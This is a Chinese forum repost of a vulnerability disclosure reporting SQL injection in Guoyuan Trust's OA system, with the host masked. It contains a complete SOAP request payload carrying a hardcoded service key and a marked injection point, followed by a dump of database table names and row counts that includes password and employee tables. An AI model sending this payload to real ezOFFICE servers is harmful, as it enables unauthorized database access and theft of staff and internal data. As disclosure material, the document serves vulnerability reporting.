HanDs
管理员

[7月漏洞公开] 国元信托某站SQL注入/大量信息泄露/可进入其他系统 



详细说明:

国元信托oa:http://**.**.**.**:7001/defaultroot/login.jsp

注入点:*号处

code 区域
POST http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 463
Host: **.**.**.**:7001
Proxy-Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
<soapenv:Header/>
<soapenv:Body>
<gen:OAManager>
<gen:input>&lt;root&gt;&lt;key&gt;auth.key.whir2012&lt;/key&gt;&lt;cmd&gt;syncUserList&lt;/cmd&gt;&lt;domain&gt;1*--&lt;/domain&gt;&lt;/root&gt;</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>



whgyxt1.png



code 区域
Database: EZOFFICE
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| SECURITY_LOG | 648684 |
| OA_INFORMATIONSTATISTICS | 632866 |
| OA_INFORMATIONBROWSER | 434800 |
| WF_DEALWITHLOG | 32484 |
| WF_PROCEEDTRANSITION | 26185 |
| WF_PROCEEDACTIVITY | 25161 |
| OA_INFORMATION | 23817 |
| WF_PROCEEDTR | 22593 |
| WF_WORK | 20605 |
| OA_INFORMATIONACCESSORY | 15978 |
| WF_DEALWITHCOMMENT | 13968 |
| WF_DEALWITH | 12238 |
| DOCUMENT_SIGNATURE | 11367 |
| OA_ALLATTACH | 9610 |
| SYS_EXPORT_SCHEMA_08 | 8288 |
| SYS_EXPORT_SCHEMA_06 | 8267 |
| SYS_EXPORT_SCHEMA_05 | 8256 |
| SYS_EXPORT_SCHEMA_04 | 8244 |
| SYS_EXPORT_SCHEMA_03 | 8234 |
| SYS_EXPORT_SCHEMA_01 | 8217 |
| ORG_TMPPASSWORD | 7176 |
| OA_MAIL_USER | 6937 |
| EZ_FLOW_ACTION_LOG | 6929 |
| EZ_BPMPOOL_PROCINST | 4689 |
| EZ_FLOW_HI_ACTINST | 4385 |
| WF_PROCEEDFLOW | 4287 |
| DOCUMENT | 3882 |
| DOCUMENT_FILE | 3762 |
| OA_MAILINTERIOR | 3539 |
| OA_ANSWERSHEETOPTION | 3054 |
| EZ_FLOW_HI_TASKINST | 2956 |
| OA_DISTRICT | 2476 |
| SYS_EXPORT_SCHEMA_07 | 2371 |
| WHIR$CITY | 2232 |
| WF_READWRITECONTROL | 2203 |
| EZ_FLOW_RE_COMMENT | 2102 |
| OA_INFORMATIONHISTORY | 2079 |
| WHIR$T3011 | 1950 |
| OA_INFORPERSONALSTAT | 1876 |
| EXPORT000002 | 1772 |
| OA_ANSWERSHEETCONTENT | 1558 |
| OA_INFORORGSTAT | 992 |
| ORG_SYNCRTX | 941 |
| EZ_FLOW_RU_VARIABLE | 847 |
| ORG_RIGHTSCOPE | 839 |
| WHIR$T3013 | 800 |
| OA_THEMEOPTION | 780 |
| OA_INFORHISTORYACCESSORY | 761 |
| EZ_FLOW_HI_PROCINST | 742 |
| OA_MAILACCESSORY | 728 |
| WHIR$T3023 | 627 |
| TELT | 515 |
| EZ_FORM_FIELD | 510 |
| OA_VOITUREAPPLY | 510 |
| OA_PASSWORD_HISTORY | 503 |
| EZ_FLOW_GE_BYTEARRAY | 471 |
| TFIELD | 400 |
| GOV_RECEIVEFILE | 393 |
| OA_PATCHINFO | 377 |
| WF_IMMOBILITYFIELD | 370 |
| WF_TRANSITIONRESTRICTION | 367 |
| ZL_USER_INFO | 281 |
| ORG_RIGHT | 269 |
| WF_TRANSITION | 249 |
| WF_ACTIVITY | 245 |
| ORG_EMPLOYEE | 216 |
| ORG_ORGANIZATION_USER | 214 |
| WHIR$COUNTRY | 210 |
| EZ_SECU_ERRORCLIENT | 205 |
| ORG_ROLE_RIGHT | 200 |
| OA_SYSTEM_REMIND | 188 |
| HR_RPT_INIT_FIELD | 183 |
| SECURITY_LOGOIN_ERROR | 182 |
| GOV_SENDDOCUMENTUPDATE | 179 |
| WHIR$T3010 | 155 |
| EZ_FLOW_DE_ACTIVITY | 144 |
| EZ_FLOW_RE_DEPLOYMENT | 135 |
| EZ_FLOW_RE_PROCDEF | 135 |
| EZ_SECU_PAGELIST | 124 |
| OA_INFORMATIONCHANNEL | 119 |
| OA_QUESTHEME | 119 |
| EMPLOYEE_20110217145223SCOPE | 118 |
| EMPLOYEE_20110217150839SCOPE | 118 |
| OA_ANSWERSHEET | 116 |
| HR_S_GZXM | 100 |
| GOV_CUSTOM_CHECKFIELD | 98 |
| BOOKMARKS | 94 |
| EZ_FLOW_RU_EXECUTION | 90 |
| GOV_CUSTOM_FIELD | 87 |
| WHIR$T3024 | 87 |
| OA_CUSTMENU | 81 |
| WHIR$T3015 | 80 |
| OA_PORTAL_PORTLET_SETTING | 76 |
| WHIR$T3025 | 75 |
| OA_PORTAL_PORTLET | 73 |
| OA_MENUSET | 68 |
| TSHOW | 67 |
| WF_GRAPH_UNIT | 59 |
| EZ_BPMPOOL_PROCESSPACKAGE | 56 |
| SECURITY_LOG_MODULE | 56 |
| WF_PACKAGE | 56 |
| ORG_USER_ROLE | 55 |
| EZ_BPMPOOL_PROCESS | 54 |
| GOV_DOCUMENTSENDFILE | 53 |
| OA_PERSONOA_USER_PRESS_RELATIO | 53 |
| OA_INFORMATIONCOMMENT | 51 |
| ORG_LOGINPAGESETTAB | 51 |
| TAREA | 50 |
| ORG_USER_GROUP | 46 |
| TPAGE | 46 |
| EZ_FORM_TABLE | 44 |
| WHIR$T3032 | 44 |
| EZ_FORM | 40 |
| OA_WORKLOG | 40 |
| WF_NEEDFLOWMODULE | 40 |
| OA_NETDISK_FILE | 39 |
| OA_OFFICALDICTION | 39 |
| WHIR$T3009 | 38 |
| EZ_BPMPOOL_PROCESS_STARTUSER | 37 |
| WF_IMMOBILITYFORM | 37 |
| WF_WORKFLOW_DESIGNER | 37 |
| TTABLE | 34 |
| WHIR$PROVINCE | 34 |
| OA_PORTAL_LAYOUT_PORTLET | 32 |
| EZ_FLOW_DE_DESIGFORM | 28 |
| EZ_FLOW_DE_DESIGNER | 28 |
| EZ_FLOW_RE_PACK_PDE | 28 |
| ORG_ORGANIZATION | 28 |
| TEMPLATE_BOOKMARKS | 28 |
| EZ_BPMPOOL_PROCESS_STARTORG | 27 |
| WF_DEALWITHCOMMENT_DRAFT | 27 |
| WF_WORKFLOWPROCESS | 27 |
| CUSTOMER_CENTER | 26 |
| OA_PERSONOA_PRESS | 26 |
| EZ_FLOW_RU_TASK | 25 |
| OA_INFORMATION_PRINT | 25 |
| EVO_WEIXIN_ORGMAP | 24 |
| OA_DUTY | 24 |
| OA_PORTAL_LAYOUT | 24 |
| WF_WORKFLOWWRITECONTROL | 24 |
| WF_OA_RELATEFIELD | 22 |
| OA_INFORMATION_DEPARTMENT_XML | 21 |
| EZ_FORM_PRINT | 20 |
| OA_EVENTATTENDER | 20 |
| SITE_RIGHT | 20 |
| WHIR$T3040 | 19 |
| OA_BOARDROOM_PERSONS | 17 |
| ORG_20110217150839 | 16 |
| ORG_ROLE | 16 |
| GOV_SENDDOCUMENTTOPICAL | 15 |
| WHIR$T3031 | 15 |
| MS_MODEL | 14 |
| OA_RELATIONMODULE | 14 |
| OA_PORTAL_TYPE | 13 |
| DOCUMENT_HISTORY | 12 |
| GOV_DOCUMENTUNIT | 12 |
| OA_PERSONAL_POSITIONS | 12 |
| TMODEL | 12 |
| EZ_BPMPOOL_RELATIONPROCESS | 11 |
| OA_EVENT | 11 |
| OA_GRAPHREPORT | 11 |
| OA_GRAPHREPORT_TYPE | 11 |
| OA_VOITURE | 11 |
| WHIR$T3026 | 11 |
| HR_S_INCOME_TAX | 9 |
| OA_BOARDROOM_EXECUTESTATUS | 9 |
| OA_EXT_TABLE | 9 |
| OA_MENU | 9 |
| OA_PORTAL_TEMPLATE | 9 |
| TAREATYPE | 9 |
| WF_OLDCOMMENTLOG | 9 |
| WHIR$T3028 | 9 |
| HR_S_RATIO_SETTING | 8 |
| OA_BDROOMAPPTYPE | 8 |
| OA_INFORMATIONSTATISTICSTYPE | 8 |
| ORG_GROUP | 8 |
| WF_RU_REMINDINFO | 8 |
| WHIR$T3020 | 8 |
| GOV_RECEIVEFILENUMSEQ | 7 |
| GOV_RECEIVEFILESEQ | 7 |
| OA_EMPLOYEE_STATUS | 7 |
| OA_EXT_SHOW | 7 |
| OA_PERSONONDUTY | 7 |
| OA_RELATIONOBJECT | 7 |
| OA_STATUS_DETAIL | 7 |
| TEMPLATE_FILE | 7 |
| WF_RELATIONPROCESS | 7 |
| WHIR$T3018 | 7 |
| GOV_SENDDOCUMENTNUM | 6 |
| GOV_SENDDOCUMENTWORD | 6 |
| OA_MATURITY_ALERT_SETTINGS | 6 |
| OA_QUESTIONNAIRE | 6 |
| ORG_EMPLOYEE_EDUSTORY | 6 |
| ORG_SIDELINE | 6 |
| EMPLOYEE_20110217145223ROLE | 5 |
| EMPLOYEE_20110217150839ROLE | 5 |
| EZ_FORM_MODULE | 5 |
| LDAPSET | 5 |
| OA_DEPARTMENTSTYLE | 5 |
| OA_INFORMATIONLUCENETEMP | 5 |
| OA_SYSDICT | 5 |
| SIGNATURE | 5 |
| SYS_CORP_SET_APP | 5 |
| SYS_EXPORT_SCHEMA_02 | 5 |
| WHIR$T3016 | 5 |
| WHIR$T3022 | 5 |
| WHIR$T3027 | 5 |
| EZ_BPMPOOL_COMMONPROCESS | 4 |
| HR_RPT_SHOW_FIELD | 4 |
| MS_INFOFLOW | 4 |
| OA_EXT_TYPE | 4 |
| OA_PORTAL_PORTLET_FILE | 4 |
| OA_TASK | 4 |
| OA_TASKEXEC | 4 |
| OA_TASKVIEW | 4 |
| TTYPE | 4 |
| EZ_FLOW_GE_PROPERTY | 3 |
| GJ_EMPCHANGETYPE | 3 |
| GOV_CUSTOM_DOCUMNET | 3 |
| OA_DOSSIER_GDSET | 3 |
| SECURITY_ONLINEUSER | 3 |
| UNION_TASKFROM | 3 |
| USER_ORG_SYN_ERRLOG | 3 |
| ZL_ORG_INFO | 3 |
| EMPLOYEE_20110217145223 | 2 |
| EMPLOYEE_20110217150839 | 2 |
| EZ_FLOW_RU_PROCDRAFT | 2 |
| HR_DEPT_KIND | 2 |
| HR_PERSON_TYPE | 2 |
| LDAPACCOUNTS | 2 |
| OA_BOARDROOM | 2 |
| OA_CARDEMPINFO | 2 |
| OA_CUSTOMDESKTOPLAYOUT | 2 |
| OA_FORUM | 2 |
| OA_FORUMCLASS | 2 |
| OA_NOTEPAPER | 2 |
| OA_PERSONALSTAT | 2 |
| OA_SYSTEM_USERMODULE | 2 |
| OA_TRAINCLASS | 2 |
| TLIMIT | 2 |
| TSEQ | 2 |
| VERSION_FILE | 2 |
| WEIBO_USER | 2 |
| WF_WORK_ACCESSORY | 2 |
| WHIR$T3030 | 2 |
| WHIR$T3041 | 2 |
| EMPLOYEE_20110217145223USER | 1 |
| EMPLOYEE_20110217150839USER | 1 |
| EZ_BPMPOOL_PROCESS_STARTGROUP | 1 |
| GJ_DRAWDEPT | 1 |
| GJ_GOODS | 1 |
| GJ_GOODSTYPE | 1 |
| GJ_PTDETAIL | 1 |
| GJ_PTMASTER | 1 |
| GJ_STOCK | 1 |
| GJ_STOCK_GOODSTYPE | 1 |
| GJ_SUPPLYUNIT | 1 |
| GOV_DOCUMENTFILETYPE | 1 |
| GOV_RECEIVEDOCUMENTBASEINFO | 1 |
| GOV_SENDDOCUMENTBASEINFO | 1 |
| GOV_SENDFILE_USER | 1 |
| HR_RPT_SOLUTION | 1 |
| HR_S_FFFS_SETTING | 1 |
| OA_BOARDROOM_MEETINGTIME | 1 |
| OA_BOARDROOMAPPLY | 1 |
| OA_BOOKS | 1 |
| OA_BOOKSTYPE | 1 |
| OA_DIARYCLASS | 1 |
| OA_INFORMATIONTAG | 1 |
| OA_LIBRARY | 1 |
| OA_MAIL_H_SET | 1 |
| OA_ORGWRAP | 1 |
| OA_PERSONSETUP | 1 |
| OA_PORTAL_MENU_SETTING | 1 |
| OA_RECORDTYPE | 1 |
| OA_SEQ | 1 |
| OA_SYS_MAILREMIND | 1 |
| OA_TASKHISTORY | 1 |
| OA_TASKREMIND | 1 |
| OA_TRAINRECORD | 1 |
| OA_UNITINFO | 1 |
| OA_VOITUREAUDITING | 1 |
| OA_VOITURETYPE | 1 |
| OA_WF_OVERDATE | 1 |
| OA_WF_WORKDATE | 1 |
| OA_WORKADDRESS_TYPE | 1 |
| OACONSOLE_MANAGER | 1 |
| ORG_20110217145223 | 1 |
| ORG_20110217145223USER | 1 |
| ORG_20110217150839USER | 1 |
| ORG_DOMAIN | 1 |
| ORG_GROUP_CLASS | 1 |
| ORG_MANAGER | 1 |
| ORG_ROLE_CLASS | 1 |
| SECURITY_DOG | 1 |
| SECURITY_IP | 1 |
| SITE_MANAGER | 1 |
| SYS_CORP_SET | 1 |
| WH_APPEND | 1 |
+--------------------------------+---------+



登录后,可以看到内部邮件以及其他的集成系统,所以危害还是蛮大的

whgyxt2.png





漏洞证明:

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
国元
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复